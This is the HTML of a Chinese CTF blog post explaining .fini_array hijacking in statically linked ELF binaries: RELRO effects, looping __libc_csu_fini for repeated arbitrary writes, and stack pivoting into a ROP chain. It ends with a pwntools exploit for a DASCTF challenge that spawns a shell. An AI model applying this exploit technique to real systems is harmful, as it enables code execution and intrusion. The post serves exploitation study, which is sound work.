<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"github.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="fini_array劫持（没写完）总结 虽然写代码的时候我们以main函数作为程序入口，但是编译成程序的时候入口并不是main函数，而是start代码段。事实上，start代码段还会调用__libc_start_main来做一些初始化工作，最后调用main函数并在main函数结束后做一些处理。其流程见于链接http:&#x2F;&#x2F;dbp-consulting.com&#x2F;tutorials&#x2F;debugging&#x2F;">
<meta property="og:type" content="article">
<meta property="og:title" content="fini_array劫持">
<meta property="og:url" content="https://github.com/CharonPt/CharonPt.github.io.git/2021/11/26/fini_array%E5%8A%AB%E6%8C%81/index.html">
<meta property="og:site_name" content="CharonPt的Blog">
<meta property="og:description" content="fini_array劫持（没写完）总结 虽然写代码的时候我们以main函数作为程序入口，但是编译成程序的时候入口并不是main函数，而是start代码段。事实上，start代码段还会调用__libc_start_main来做一些初始化工作，最后调用main函数并在main函数结束后做一些处理。其流程见于链接http:&#x2F;&#x2F;dbp-consulting.com&#x2F;tutorials&#x2F;debugging&#x2F;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://github.com/2021/11/26/fini_array%E5%8A%AB%E6%8C%81/fini.png">
<meta property="article:published_time" content="2021-11-26T07:21:49.000Z">
<meta property="article:modified_time" content="2021-12-07T08:45:05.418Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/2021/11/26/fini_array%E5%8A%AB%E6%8C%81/fini.png">

<link rel="canonical" href="https://github.com/CharonPt/CharonPt.github.io.git/2021/11/26/fini_array%E5%8A%AB%E6%8C%81/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>fini_array劫持 | CharonPt的Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">CharonPt的Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://github.com/CharonPt/CharonPt.github.io.git/2021/11/26/fini_array%E5%8A%AB%E6%8C%81/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="CharonPt的Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          fini_array劫持
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-11-26 15:21:49" itemprop="dateCreated datePublished" datetime="2021-11-26T15:21:49+08:00">2021-11-26</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-12-07 16:45:05" itemprop="dateModified" datetime="2021-12-07T16:45:05+08:00">2021-12-07</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="fini-array劫持（没写完）"><a href="#fini-array劫持（没写完）" class="headerlink" title="fini_array劫持（没写完）"></a>fini_array劫持（没写完）</h2><h4 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h4><ul>
<li><p>虽然写代码的时候我们以main函数作为程序入口，但是编译成程序的时候入口并不是main函数，而是start代码段。事实上，start代码段还会调用__libc_start_main来做一些初始化工作，最后调用main函数并在main函数结束后做一些处理。其流程见于链接<a target="_blank" rel="noopener" href="http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html">http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html</a></p>
<img src="/2021/11/26/fini_array%E5%8A%AB%E6%8C%81/fini.png" class>

<p>简单地说，在main函数前会调用 <code>.init</code> 段代码和 <code>.init_array</code> 段的函数数组中每一个函数指针。同样的，main函数结束后也会调用 <code>.fini</code> 段代码和 <code>.fini_array</code> 段的函数数组中每一个函数指针。</p>
</li>
<li><p>当<code>RELRO</code>保护为<code>NO RELRO</code>的时候，<code>init.array、fini.array、got.plt</code>均可读可写；</p>
<p>为<code>PARTIAL RELRO</code>的时候，<code>ini.array、fini.array</code>可读不可写，<code>got.plt</code>可读可写；</p>
<p>为<code>FULL RELRO</code>时，<code>init.array、fini.array、got.plt</code>均可读不可写。</p>
</li>
</ul>
<figure class="highlight plaintext"><figcaption><span>数组中存在两个函数指针，分别指向下面两个函数：</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">array[0]:__do_global_dtors_aux </span><br><span class="line">array[1]:fini</span><br><span class="line"></span><br><span class="line">这两个函数都会在main函数执行完后执行，且先执行 ```array[1]``` 再执行 ```array[0]``` ，如果我们覆盖了这两个函数指针，就可以劫持程序的执行流。同时这两个函数指针在 ```__libc_csu_fini``` 中被执行，所以如果我们将 ```array[0]``` 覆盖为 ```__libc_csu_fini``` ，将 ```array[1]``` 覆盖为另一个地址A，那么按照执行顺序，在执行完main函数后，在 ```___libc_csu_fini``` 中执行 ```array[1]``` 的地址A，然后执行 ```array[0]``` ，显然因为 ```array[0]``` 被覆盖成了 ```__libc_csu_fini``` ，所以程序会再次执行地址A......，如下图</span><br><span class="line"></span><br><span class="line">&#123;% asset_img fini-1.jpg %&#125;</span><br><span class="line"></span><br><span class="line">显然，如果 ```array[0]``` 中的 ```__libc_csu_fini``` 不变，地址A就会无限次执行，如果地址A中存在有限字节的任意地址写，那么我们就可以通过这个循环实现无限字节的任意地址写。</span><br><span class="line"></span><br><span class="line">在 ```__libc_csu_fini```函数中有这样一句代码 ```.text:0000000000402968                 lea     rbp, fini_array_0```，其将rbp修改为 ```fini_array_0``` 的首地址，所以我们就可以配合 ```leave;ret``` 和 ```ret``` 指令将栈迁移至 ```fini_array``` 中。</span><br><span class="line"></span><br><span class="line">#### 具体步骤</span><br><span class="line"></span><br><span class="line">1. 将 ```fini_array_0``` 修改为``` __libc_csu_fini``` 的地址，将``` fini_array_1``` 修改为```func()```</span><br><span class="line">2. 利用 ```func()``` 中存在的任意地址写，在 ```fini_array + 0x10``` 处构造ROP链</span><br><span class="line">3. 将 ```fini_array_0``` 修改为 ```leave_ret``` ，将 ```fini_array_1``` 修改为 ```ret```</span><br><span class="line"></span><br><span class="line">#### 在 fini_array + 0x10 处构造ROP链的解释</span><br><span class="line"></span><br><span class="line">我们构造完ROP链后有两种方法将栈迁移至 ```fini_array``` </span><br><span class="line"></span><br><span class="line">##### 方法一：在 fini_array[0] 处迁移栈</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>fini_array + 0x0: (gadget)leave_ret<br>fini_array + 0x8: (gadget)ret<br>fini_array + 0x10: ROP chain</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">我们利用循环构造完ROP链之后，在下一次循环中需要将 fini_array[0] 和 fini_array[1] 分别修改为 leave_ret 和 ret ，修改完后此时循环从 fini_array[1] =&gt; fini_array[0] 中，因为在上一次循环中 __libc_csu_fini 会将 rbp 迁移到 fini_array 的首地址，所以程序在这一步执行的 fini_array[0] 中的 leave_ret 会将 rsp 迁移到 fini_array + 0x10 的位置中，同时 rip 被修改为 ret，所以再执行完 ret 后，位于 fini_array + 0x10 处的ROP链就被 pop 到了 rip 中，这样就能执行完我们的ROP链。图示如下：</span><br><span class="line"></span><br><span class="line">&#123;% asset_img fini-p1.jpg %&#125;</span><br><span class="line"></span><br><span class="line">&#123;% asset_img fini-p2.jpg %&#125;</span><br><span class="line"></span><br><span class="line">##### 方法二：在 fini_array[1] 处迁移栈（需要迁移两次）</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>fini_array + 0x0: (data)fini_array+0x8<br>fini_array + 0x8: (gadget)leave_ret<br>fini_array + 0x10: rop chain</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">#### 一道例题（DASCTF — Memory Monster II）</span><br><span class="line"></span><br><span class="line">程序保护如下：</span><br><span class="line"></span><br><span class="line">&#123;% asset_img checksec.png %&#125;</span><br><span class="line"></span><br><span class="line">这是一道静态链接的题目，同时符号表被删除了，start()函数如下：</span><br><span class="line"></span><br><span class="line">&#123;% asset_img start.jpg %&#125;</span><br><span class="line"></span><br><span class="line">我们知道start()的第一个参数是main()，第四个参数是 __libc_csu_init，第五个参数是 _libc_csu_fini，所以我们可以找到这三个函数。</span><br><span class="line"></span><br><span class="line">&#123;% asset_img start-1.jpg %&#125;</span><br><span class="line"></span><br><span class="line">main()函数如下（给函数改了名方便阅读）：</span><br><span class="line"></span><br><span class="line">&#123;% asset_img main.jpg %&#125;</span><br><span class="line"></span><br><span class="line">可以看到main()中实际是存在Canary的，同时存在程序给的任意地址写，所以我们可以利用这个任意地址写来构造ROP链。因为是静态链接的题目，所以我们可以找到我们所需要的gadget来构造系统调用。显然 0x18 个字节的任意地址写远不够我们使用，所以我们可以劫持 fini_array 来重复使用程序的这段任意地址写来将ROP链构造完成。相关细节在前面已经说过，这里不再赘述，exp如下：</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>from pwn import*</p>
<p>p = process(“./2”)<br>context.arch = ‘amd64’</p>
<p>fini_array = 0x4B80B0<br>_libc_csu_fini = 0x402CB0<br>main = 0x401C1D<br>ret = 0x401016<br>pop_rdx = 0x448415<br>pop_rsi = 0x406f80<br>pop_rdi = 0x401746<br>leave_ret = 0x401cf3<br>pop_rax = 0x448fcc<br>binsh = 0x492895<br>syscall = 0x402514</p>
<p>def write(addr,data):<br>    p.sendlineafter(“addr:”,p64(addr))<br>    p.sendafter(“data:”,data)</p>
<p>p1 = p64(_libc_csu_fini) + p64(main)<br>write(fini_array,p1)<br>p2 = flat(pop_rax,59,pop_rdi)<br>write(fini_array + 0x10,p2)<br>p3 = flat(binsh,pop_rsi,0)<br>write(fini_array + 0x10 + 0x18,p3)<br>p4 = flat(pop_rdx,0,syscall)<br>write(fini_array + 0x10 + 0x18 + 0x18,p4)</p>
<p>p5 = flat(leave_ret,ret)<br>write(fini_array,p5)</p>
<p>p.interactive()</p>
<pre><code>
syscall指令可以在IDA中 alt + t 找到

&#123;% asset_img find.jpg %&#125;

一个小问题：往地址中写入值的时候不能用&quot;sendline&quot;，因为这会往地址中写入一个回车，造成错误
</code></pre>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/11/22/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2-3/" rel="prev" title="格式化字符串-3">
      <i class="fa fa-chevron-left"></i> 格式化字符串-3
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/11/27/%E6%A0%88%E8%BF%81%E7%A7%BB/" rel="next" title="栈迁移">
      栈迁移 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#fini-array%E5%8A%AB%E6%8C%81%EF%BC%88%E6%B2%A1%E5%86%99%E5%AE%8C%EF%BC%89"><span class="nav-number">1.</span> <span class="nav-text">fini_array劫持（没写完）</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">1.0.1.</span> <span class="nav-text">总结</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">24</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">15</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
